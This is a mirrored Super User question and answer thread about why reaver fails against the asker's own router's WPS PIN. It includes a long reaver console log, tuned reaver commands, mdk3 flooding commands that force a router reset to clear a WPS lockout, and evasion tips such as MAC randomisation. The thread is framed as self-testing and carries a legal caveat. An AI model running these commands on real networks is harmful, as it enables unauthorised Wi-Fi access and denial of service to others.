TransWikia.com

Why is reaver not guessing the correct PIN?

Super User Asked by Creative Magic on December 13, 2021

I’m learning about network security. This time I’m trying to pen-test my router by exploiting WPS on my router.

Here’s my router’s stats


BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
5C:03:39:40:33:FC    1  -25  2.0  No             W04_5C03394033FC

The power dBm is really high because the router and the network adapter are right next to each other 🙂

I’ve set my router’s WPS PIN to 12345670. I didn’t want to waste time on eventually getting the right PIN, I just wanted to see what happens when I get the right PIN.

I’ve set my adapter into monitor mode and launched reaver with a command:
reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon

The console output (I let it run for ~20 seconds):


root@kali:~# reaver -b 5C:03:39:40:33:FC -c 1 -vv -i wlan0mon -O /root/Desktop/Dumps/rever_test

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from 5C:03:39:40:33:FC
[+] Received beacon from 5C:03:39:40:33:FC
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2020-07-23 10:19:40 (0 seconds/pin)
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 5C:03:39:40:33:FC (ESSID: W04_5C03394033FC)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

It’s saying it’s trying the PIN, but nothing comes out of it. I’ve tested if the WPS got locked, but it wasn’t. I’m not sure what the problem is, I’d appreciate some insight as to why this might happen.

I’m running this test on Kali, adapter supports monitor mode and injection.

2 Answers

Short answer:

You need to run reaver with a more sophisticated set of rules:

reaver -i wlan0 -c 1 -b TARGET_ROUTER_MAC -vv -L -N -d 15 -T .5 -r 3:20

You will lock the router after 3-4 tries anyway. Changing your adapter's MAC after 1-2 attempts won't help.

You'll need to reset the router to reset the locked state.
You can do that by running these 5 operations (you'll need to open 5 new terminal windows and run them all at once) Source:

  1. mdk3 monX a -a xx:xx:xx:xx:xx:xx -m
  2. mdk3 monX m -t xx:xx:xx:xx:xx:xx
  3. mdk3 monX d -b blacklist -c X
  4. mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X
  5. wash -i monX -C

This won't work on all routers. But it's worth a try.


Longer version:

I had to dig for a while to get to the bottom of things.
Asked a few friends if they had old routers laying around so I had more stuff to work with.

In total I've done tests with 7 different routers. Their chip sets were:

  • AtherosC
  • RealtekS
  • RalinkTe
  • Broadcom
  • One Buffalo router came back as Unknown

Some of the routers has WPS 1.0 and some WPS 2.0.

My adapter was Panda PAU05. With the chip set that supports injection. Injection success was 94% to 100%.

NOTE: new PAU05 adapters on Amazon are sold with a different chip sets that don't support injection (Chipset RT5372). Source

I didn't test for packet drop-off on weaker signals. All the routers were on my desk, pretty my right next to the adapter. So the signal is way better than you might get normally, but for my test it didn't matter.

So, running the test with the command I've posted originally didn't get me anywhere. I left it running for ~40 min. while eating lunch and I could see it tried the second PIN, but it was basically ignored by all routers.

Digging more I've decided to try different settings. To appear more "human", I've tried adding timeouts to different steps of the process. The good news - I was getting somewhere with my tests. But it took ~40-70 seconds for one PIN to be tested. With a total possible 11000 combinations of PINs, it would take up to ~9 days to hack. But probably closer to 4-5 days since you might get the right combination sooner.

But the problem was that I actually got locked out of the router after 3-4 attempts! (WPS 2.0)
I've tried on a different router with WPS 1.0 and got locked out after ~20 attempts.

You'll know you're locked out because reaver will try to use the very first PIN again 12345670. Also if you run wash -i YOUR_ADAPTER_INTERFACE you'll see the router is locked.

OK, so maybe it's because the client is trying too many times? Or maybe it's because I should change my MAC to mimic a real user? I've logged in with a different WiFi card to that router and changed my MAC to that of a "real user". Still got locked out after a few attempts.

So maybe I should make a script that would change my MAC to a random one every time I try a PIN? No, still got locked out.

After resetting my routers manually a whole bunch of times, I thought it wouldn't work in real-life situation like that. So how would a hacker exploit this? Is WPS finally safe?

After digging in Kali forums I found a way to reset a router by spamming it until it would reset. Since all the routers I tested were old routers that my friends had before they've upgraded, they were all susceptible to resetting. Although the original forum post said it might not always work.

So I wrote a new script that would basically run reaver with longer delays to appear human. Check when reaver would try to use the starting PIN, reset the router, do it all over again.

I've later re-written the script to use a PIN from crunch - a password generating tool. And ran reaver with a -p PIN flag. Then I've ran crunch with a pattern where the right PIN was the very first one (you can do that with a pattern option and providing only one character for generation in the last slot of the pattern). Basically it takes a ton of time to redo the tests again and make sure it all starts from an initial point, so I just wanted to see the final result.

Well, it worked. But the attack is super obvious even if you don't analyze the logs - every once in a while your router would start kicking you off and restart.

Overall I'm still going to perform more tests and see if some steps can change to make more use of tools like reaver or bully.

I'll mark my answer as the right one because I got to the desired result, but I'm not satisfied with the performance. I would really like to be able to get access in ~10 minutes and not ~2 weeks. So I'll gladly change accept a different answer if a better way is shown.


It's common sense, but just in case, hacking other people's network, restarting their routers and kicking people off etc. is illegal in many countries.
It's great to learn about security, but if you use it offensively to other people - it's on you.

Answered by Creative Magic on December 13, 2021

The router you are using has WPS patched in the firmware. These attacks were mainly successful with WPS V1.0.

There are a couple of things you can still try.

  1. This router may be using a MAC lock, try randomizing the Mac address and see if it's the wireless adapter that has been locked out from attempts.

  2. Disable NACK in reaver

  3. Try wpspixie from within reaver

Depending on card and driver's in use, reaver doesn't always show locked access points correctly. My ralink card comes to mind...(Timeouts after EAPOL start requests are a good indicator of this.)

You can try using wifite (depending on Kali version) to see if it shows your router locked, some of my cards that do not show the AP locked in reaver will display correctly in wifite. It really depends on the card and driver's in use.

Edit: depending on the version of Kali (I'm talking a couple years ago) reaver wouldn't catch responses correctly without airodump-ng running simultaneously. This caveat seems to be fixed in newer versions, but it may be worth a shot to try.

Answered by Tim_Stewart on December 13, 2021

Add your own answers!

Ask a Question

Get help from others!

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP